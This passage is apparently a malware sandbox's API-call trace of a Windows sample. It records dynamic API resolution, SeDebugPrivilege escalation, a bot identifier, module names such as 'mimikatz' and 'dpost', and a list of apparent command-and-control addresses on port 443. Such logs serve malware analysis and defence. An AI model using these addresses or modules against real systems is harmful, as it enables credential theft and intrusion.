hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0a0 | out: hHeap=0x5f0000) returned 1 [0177.850] GetProcessHeap () returned 0x5f0000 [0177.850] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0f0 | out: hHeap=0x5f0000) returned 1 [0177.850] GetProcessHeap () returned 0x5f0000 [0177.850] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f190 | out: hHeap=0x5f0000) returned 1 [0177.850] GetProcessHeap () returned 0x5f0000 [0177.850] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1e0 | out: hHeap=0x5f0000) returned 1 [0177.851] GetProcessHeap () returned 0x5f0000 [0177.851] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f1e0 [0177.851] lstrlenA (lpString="mimikatz") returned 8 [0177.851] GetProcessHeap () returned 0x5f0000 [0177.851] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f160 [0177.851] lstrcpyA (in: lpString1=0x61f160, lpString2="mimikatz" | out: lpString1="mimikatz") returned="mimikatz" [0177.856] GetProcessHeap () returned 0x5f0000 [0177.856] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x6153c0 [0177.856] GetProcAddress (hModule=0x7ffb26230000, lpProcName="MultiByteToWideChar") returned 0x7ffb2624d500 [0177.856] GetProcessHeap () returned 0x5f0000 [0177.856] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6153c0 | out: hHeap=0x5f0000) returned 1 [0177.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x61f160, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0177.859] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x20) returned 0x6153c0 [0177.859] GetProcessHeap () returned 0x5f0000 [0177.859] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x615a00 [0177.859] GetProcAddress (hModule=0x7ffb26230000, lpProcName="MultiByteToWideChar") returned 0x7ffb2624d500 [0177.859] GetProcessHeap () returned 0x5f0000 [0177.859] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615a00 | out: hHeap=0x5f0000) returned 1 [0177.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x61f160, cbMultiByte=8, lpWideCharStr=0x6153c0, cchWideChar=8 | out: lpWideCharStr="mimikatz") returned 8 [0177.859] GetProcessHeap () returned 0x5f0000 [0177.859] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f160 | out: hHeap=0x5f0000) returned 1 [0177.859] GetProcessHeap () returned 0x5f0000 [0177.859] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1e0 | out: hHeap=0x5f0000) returned 1 [0177.860] GetProcessHeap () returned 0x5f0000 [0177.860] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f1e0 [0177.860] GetProcessHeap () returned 0x5f0000 [0177.860] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4) returned 0x61f1f0 [0177.860] GetProcessHeap () returned 0x5f0000 [0177.860] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1a) returned 0x615900 [0177.862] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffb19d70000 [0177.866] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x7ffb174f0000 [0178.683] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffb253c0000 [0178.683] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffb281e0000 [0178.688] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffb267e0000 [0178.689] LoadLibraryA (lpLibFileName="userenv.dll") returned 0x7ffb24880000 [0178.689] LoadLibraryA (lpLibFileName="shlwapi.dll") returned 0x7ffb262e0000 [0178.689] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffb24fb0000 [0178.689] LoadLibraryA (lpLibFileName="Oleaut32.dll") returned 0x7ffb288f0000 [0178.689] ResetEvent (hEvent=0x8) returned 1 [0178.689] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0178.713] GetProcessHeap () returned 0x5f0000 [0178.713] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f170 [0178.713] GetProcessHeap () returned 0x5f0000 [0178.713] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f1b0 [0178.713] GetProcessHeap () returned 0x5f0000 [0178.713] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1b0 | out: hHeap=0x5f0000) returned 1 [0178.713] GetProcessHeap () returned 0x5f0000 [0178.713] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f170 | out: hHeap=0x5f0000) returned 1 [0178.713] RtlAddVectoredExceptionHandler (FirstHandler=0x0, VectoredHandler=0x180002b0c) returned 0x6158a0 [0178.714] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffb26230000 [0178.714] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0178.714] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LoadLibraryW") returned 0x7ffb262550f0 [0178.714] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LoadLibraryA") returned 0x7ffb262574d0 [0178.714] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FreeLibrary") returned 0x7ffb26254810 [0178.714] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x20) returned 0x615980 [0178.714] GetProcessHeap () returned 0x5f0000 [0178.714] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f0a0 [0178.714] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0178.714] GetProcessHeap () returned 0x5f0000 [0178.714] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0a0 | out: hHeap=0x5f0000) returned 1 [0178.714] Sleep (dwMilliseconds=0xa) [0178.725] GetProcessHeap () returned 0x5f0000 [0178.725] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f1d0 [0178.725] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrlenA") returned 0x7ffb26250c60 [0178.725] GetProcessHeap () returned 0x5f0000 [0178.725] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1d0 | out: hHeap=0x5f0000) returned 1 [0178.725] lstrlenA (lpString="88.153.199.169") returned 14 [0178.728] GetProcessHeap () returned 0x5f0000 [0178.728] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f1a0 [0178.728] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrlenA") returned 0x7ffb26250c60 [0178.728] GetProcessHeap () returned 0x5f0000 [0178.728] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1a0 | out: hHeap=0x5f0000) returned 1 [0178.728] lstrlenA (lpString="88.153.199.169") returned 14 [0178.731] GetProcessHeap () returned 0x5f0000 [0178.731] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f170 [0178.731] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrlenA") returned 0x7ffb26250c60 [0178.731] GetProcessHeap () returned 0x5f0000 [0178.731] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f170 | out: hHeap=0x5f0000) returned 1 [0178.731] lstrlenA (lpString="tot153") returned 6 [0178.731] GetProcessHeap () returned 0x5f0000 [0178.731] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f0a0 [0178.732] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrlenA") returned 0x7ffb26250c60 [0178.732] GetProcessHeap () returned 0x5f0000 [0178.732] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0a0 | out: hHeap=0x5f0000) returned 1 [0178.732] lstrlenA (lpString="tot153") returned 6 [0178.732] GetProcessHeap () returned 0x5f0000 [0178.732] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f210 [0178.732] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrlenA") returned 0x7ffb26250c60 [0178.732] GetProcessHeap () returned 0x5f0000 [0178.732] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f210 | out: hHeap=0x5f0000) returned 1 [0178.732] lstrlenA (lpString="XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93") returned 49 [0178.732] GetProcessHeap () returned 0x5f0000 [0178.732] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f120 [0178.732] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrlenA") returned 0x7ffb26250c60 [0178.732] GetProcessHeap () returned 0x5f0000 [0178.732] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f120 | out: hHeap=0x5f0000) returned 1 [0178.732] lstrlenA (lpString="XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93") returned 49 [0178.732] GetProcessHeap () returned 0x5f0000 [0178.732] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f0c0 [0178.732] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0178.732] GetProcessHeap () returned 0x5f0000 [0178.732] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0178.732] Sleep (dwMilliseconds=0xa) [0178.743] GetProcessHeap () returned 0x5f0000 [0178.743] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12) returned 0x615a40 [0178.743] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetCurrentProcess") returned 0x7ffb2624b7c0 [0178.743] GetProcessHeap () returned 0x5f0000 [0178.743] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615a40 | out: hHeap=0x5f0000) returned 1 [0178.743] GetCurrentProcess () returned 0xffffffffffffffff [0178.743] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="OpenProcessToken") returned 0x7ffb28a67180 [0178.743] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0xcfdd0 | out: TokenHandle=0xcfdd0*=0x1ac) returned 1 [0178.743] GetProcessHeap () returned 0x5f0000 [0178.743] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x11) returned 0x6159a0 [0178.743] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="LookupPrivilegeValueA") returned 0x7ffb28a809e0 [0178.744] LookupPrivilegeValueA (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xcfdd8 | out: lpLuid=0xcfdd8*(LowPart=0x14, HighPart=0)) returned 1 [0178.755] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="AdjustTokenPrivileges") returned 0x7ffb28a67340 [0178.755] AdjustTokenPrivileges (in: TokenHandle=0x1ac, DisableAllPrivileges=0, NewState=0xcfd88*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0178.756] GetProcessHeap () returned 0x5f0000 [0178.756] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f120 [0178.756] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CloseHandle") returned 0x7ffb2625d650 [0178.756] GetProcessHeap () returned 0x5f0000 [0178.756] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f120 | out: hHeap=0x5f0000) returned 1 [0178.756] CloseHandle (hObject=0x1ac) returned 1 [0178.756] GetProcessHeap () returned 0x5f0000 [0178.756] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6159a0 | out: hHeap=0x5f0000) returned 1 [0178.756] GetProcessHeap () returned 0x5f0000 [0178.756] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f1a0 [0178.759] GetProcessHeap () returned 0x5f0000 [0178.759] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1a) returned 0x6159a0 [0178.759] GetProcAddress (hModule=0x7ffb26230000, lpProcName="InitializeCriticalSection") returned 0x7ffb28b6ced0 [0178.759] GetProcessHeap () returned 0x5f0000 [0178.759] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6159a0 | out: hHeap=0x5f0000) returned 1 [0178.760] GetProcessHeap () returned 0x5f0000 [0178.760] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12) returned 0x6159a0 [0178.760] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetCurrentProcess") returned 0x7ffb2624b7c0 [0178.760] GetProcessHeap () returned 0x5f0000 [0178.760] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6159a0 | out: hHeap=0x5f0000) returned 1 [0178.760] GetCurrentProcess () returned 0xffffffffffffffff [0178.760] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="OpenProcessToken") returned 0x7ffb28a67180 [0178.760] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0xcfde0 | out: TokenHandle=0xcfde0*=0x1ac) returned 1 [0178.760] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="GetTokenInformation") returned 0x7ffb28a66610 [0178.760] GetTokenInformation (in: TokenHandle=0x1ac, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcfdd8 | out: TokenInformation=0x0, ReturnLength=0xcfdd8) returned 0 [0178.760] GetLastError () returned 0x7a [0178.760] GetProcessHeap () returned 0x5f0000 [0178.760] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f220 [0178.760] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GlobalAlloc") returned 0x7ffb26250de0 [0178.760] GetProcessHeap () returned 0x5f0000 [0178.760] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0178.760] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="GetTokenInformation") returned 0x7ffb28a66610 [0178.760] GetTokenInformation (in: TokenHandle=0x1ac, TokenInformationClass=0x1, TokenInformation=0x613230, TokenInformationLength=0x2c, ReturnLength=0xcfdd8 | out: TokenInformation=0x613230, ReturnLength=0xcfdd8) returned 1 [0178.761] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="ConvertSidToStringSidW") returned 0x7ffb28a66130 [0178.761] ConvertSidToStringSidW (in: Sid=0x613240*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0xcfde8 | out: StringSid=0xcfde8*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0178.761] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x20) returned 0x6159a0 [0178.763] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6159a0 | out: hHeap=0x5f0000) returned 1 [0178.763] GetProcessHeap () returned 0x5f0000 [0178.763] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f100 [0178.763] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GlobalFree") returned 0x7ffb2624dcc0 [0178.763] GetProcessHeap () returned 0x5f0000 [0178.764] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f100 | out: hHeap=0x5f0000) returned 1 [0178.766] GetProcessHeap () returned 0x5f0000 [0178.766] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1a) returned 0x6159a0 [0178.766] GetProcAddress (hModule=0x7ffb26230000, lpProcName="InitializeCriticalSection") returned 0x7ffb28b6ced0 [0178.766] GetProcessHeap () returned 0x5f0000 [0178.766] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6159a0 | out: hHeap=0x5f0000) returned 1 [0178.766] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x6159a0 [0178.766] lstrlenA (lpString="") returned 0 [0178.766] GetProcessHeap () returned 0x5f0000 [0178.766] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f1b0 [0178.767] lstrcpyA (in: lpString1=0x61f1b0, lpString2="" | out: lpString1="") returned="" [0178.767] GetProcessHeap () returned 0x5f0000 [0178.767] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f0a0 [0178.767] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x28) returned 0x6133e0 [0178.767] GetProcessHeap () returned 0x5f0000 [0178.767] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1b0 | out: hHeap=0x5f0000) returned 1 [0178.767] GetProcessHeap () returned 0x5f0000 [0178.767] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1a) returned 0x6159c0 [0178.767] GetProcAddress (hModule=0x7ffb26230000, lpProcName="InitializeCriticalSection") returned 0x7ffb28b6ced0 [0178.767] GetProcessHeap () returned 0x5f0000 [0178.767] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6159c0 | out: hHeap=0x5f0000) returned 1 [0178.770] GetProcessHeap () returned 0x5f0000 [0178.770] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f0c0 [0178.770] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CreateThread") returned 0x7ffb262516f0 [0178.770] GetProcessHeap () returned 0x5f0000 [0178.770] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0178.770] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1800027bc, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0xcfe58 | out: lpThreadId=0xcfe58*=0x948) returned 0x1cc [0178.771] GetProcessHeap () returned 0x5f0000 [0178.771] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x61f0c0 [0178.771] GetProcessHeap () returned 0x5f0000 [0178.771] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0178.771] GetProcessHeap () returned 0x5f0000 [0178.771] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1a0 | out: hHeap=0x5f0000) returned 1 [0178.773] ResetEvent (hEvent=0x8) returned 1 [0178.773] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0179.587] GetProcessHeap () returned 0x5f0000 [0179.587] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f1a0 [0179.587] lstrlenA (lpString="dpost") returned 5 [0179.587] GetProcessHeap () returned 0x5f0000 [0179.587] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f1b0 [0179.587] lstrcpyA (in: lpString1=0x61f1b0, lpString2="dpost" | out: lpString1="dpost") returned="dpost" [0179.587] GetProcessHeap () returned 0x5f0000 [0179.587] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f0c0 [0179.590] GetProcessHeap () returned 0x5f0000 [0179.590] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f0d0 [0179.590] GetProcessHeap () returned 0x5f0000 [0179.590] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0179.590] GetProcessHeap () returned 0x5f0000 [0179.590] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0d0 | out: hHeap=0x5f0000) returned 1 [0179.590] GetProcessHeap () returned 0x5f0000 [0179.591] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1b0 | out: hHeap=0x5f0000) returned 1 [0179.591] GetProcessHeap () returned 0x5f0000 [0179.591] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1a0 | out: hHeap=0x5f0000) returned 1 [0179.591] GetProcessHeap () returned 0x5f0000 [0179.591] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x15) returned 0x615dc0 [0179.591] GetProcAddress (hModule=0x7ffb26230000, lpProcName="EnterCriticalSection") returned 0x7ffb28b2e600 [0179.591] GetProcessHeap () returned 0x5f0000 [0179.591] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615dc0 | out: hHeap=0x5f0000) returned 1 [0179.591] GetProcessHeap () returned 0x5f0000 [0179.591] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x204) returned 0x611d40 [0179.591] GetProcessHeap () returned 0x5f0000 [0179.591] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x15) returned 0x615fa0 [0179.591] GetProcAddress (hModule=0x7ffb26230000, lpProcName="EnterCriticalSection") returned 0x7ffb28b2e600 [0179.591] GetProcessHeap () returned 0x5f0000 [0179.591] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615fa0 | out: hHeap=0x5f0000) returned 1 [0179.591] lstrlenA (lpString="\r\nhttp://195.39.233.29:443\r\nhttp://178.151.205.154:443\r\nhttp://103.239.6.30:443\r\nhttp://109.87.143.67:443\r\nhttp://178.182.254.64:443\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n") returned 516 [0179.591] GetProcessHeap () returned 0x5f0000 [0179.591] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x205) returned 0x60f270 [0179.591] lstrcpyA (in: lpString1=0x60f270, lpString2="\r\nhttp://195.39.233.29:443\r\nhttp://178.151.205.154:443\r\nhttp://103.239.6.30:443\r\nhttp://109.87.143.67:443\r\nhttp://178.182.254.64:443\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n" | out: lpString1="\r\nhttp://195.39.233.29:443\r\nhttp://178.151.205.154:443\r\nhttp://103.239.6.30:443\r\nhttp://109.87.143.67:443\r\nhttp://178.182.254.64:443\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n") returned="\r\nhttp://195.39.233.29:443\r\nhttp://178.151.205.154:443\r\nhttp://103.239.6.30:443\r\nhttp://109.87.143.67:443\r\nhttp://178.182.254.64:443\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n" [0179.595] GetProcessHeap () returned 0x5f0000 [0179.595] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f220 [0179.595] GetProcessHeap () returned 0x5f0000 [0179.595] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f220, Size=0x205) returned 0x6247e0 [0179.595] GetProcessHeap () returned 0x5f0000 [0179.595] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f0c0 [0179.595] GetProcessHeap () returned 0x5f0000 [0179.595] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x61f160 [0179.595] lstrlenA (lpString="<") returned 1 [0179.595] GetProcessHeap () returned 0x5f0000 [0179.595] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f0d0 [0179.595] lstrcpyA (in: lpString1=0x61f0d0, lpString2="<" | out: lpString1="<") returned="<" [0179.595] GetProcessHeap () returned 0x5f0000 [0179.595] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f220 [0179.595] GetProcessHeap () returned 0x5f0000 [0179.596] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f220, Size=0x11) returned 0x615f00 [0179.596] GetProcessHeap () returned 0x5f0000 [0179.596] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0d0 | out: hHeap=0x5f0000) returned 1 [0179.596] lstrlenA (lpString=">") returned 1 [0179.596] GetProcessHeap () returned 0x5f0000 [0179.596] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f220 [0179.596] lstrcpyA (in: lpString1=0x61f220, lpString2=">" | out: lpString1=">") returned=">" [0179.596] lstrlenA (lpString="") returned 1 [0179.599] GetProcessHeap () returned 0x5f0000 [0179.599] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f220 [0179.600] lstrcpyA (in: lpString1=0x61f220, lpString2=">" | out: lpString1=">") returned=">" [0179.600] lstrlenA (lpString=">") returned 4 [0179.600] GetProcessHeap () returned 0x5f0000 [0179.600] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f1a0 [0179.600] lstrcpyA (in: lpString1=0x61f1a0, lpString2=">" | out: lpString1=">") returned=">" [0179.600] GetProcessHeap () returned 0x5f0000 [0179.600] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1a0 | out: hHeap=0x5f0000) returned 1 [0179.600] GetProcessHeap () returned 0x5f0000 [0179.600] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0179.600] GetProcessHeap () returned 0x5f0000 [0179.600] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f0c0, Size=0x19) returned 0x615c80 [0179.600] GetProcessHeap () returned 0x5f0000 [0179.600] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615d60 | out: hHeap=0x5f0000) returned 1 [0179.600] GetProcessHeap () returned 0x5f0000 [0179.600] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615cc0 | out: hHeap=0x5f0000) returned 1 [0179.601] GetProcessHeap () returned 0x5f0000 [0179.601] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f00 | out: hHeap=0x5f0000) returned 1 [0179.601] GetProcessHeap () returned 0x5f0000 [0179.601] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f160 | out: hHeap=0x5f0000) returned 1 [0179.601] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x61f1a0 [0179.601] GetProcessHeap () returned 0x5f0000 [0179.601] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x19) returned 0x615f20 [0179.601] GetProcessHeap () returned 0x5f0000 [0179.601] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x61f1b0 [0179.601] lstrlenA (lpString="<") returned 1 [0179.601] GetProcessHeap () returned 0x5f0000 [0179.601] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f140 [0179.601] lstrcpyA (in: lpString1=0x61f140, lpString2="<" | out: lpString1="<") returned="<" [0179.601] GetProcessHeap () returned 0x5f0000 [0179.601] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f220 [0179.601] GetProcessHeap () returned 0x5f0000 [0179.601] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f220, Size=0x11) returned 0x615da0 [0179.601] GetProcessHeap () returned 0x5f0000 [0179.601] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f140 | out: hHeap=0x5f0000) returned 1 [0179.601] lstrlenA (lpString=">") returned 1 [0179.601] GetProcessHeap () returned 0x5f0000 [0179.601] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f0d0 [0179.601] lstrcpyA (in: lpString1=0x61f0d0, lpString2=">" | out: lpString1=">") returned=">" [0179.601] lstrlenA (lpString="") returned 1 [0179.603] GetProcessHeap () returned 0x5f0000 [0179.603] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f100 [0179.603] lstrcpyA (in: lpString1=0x61f100, 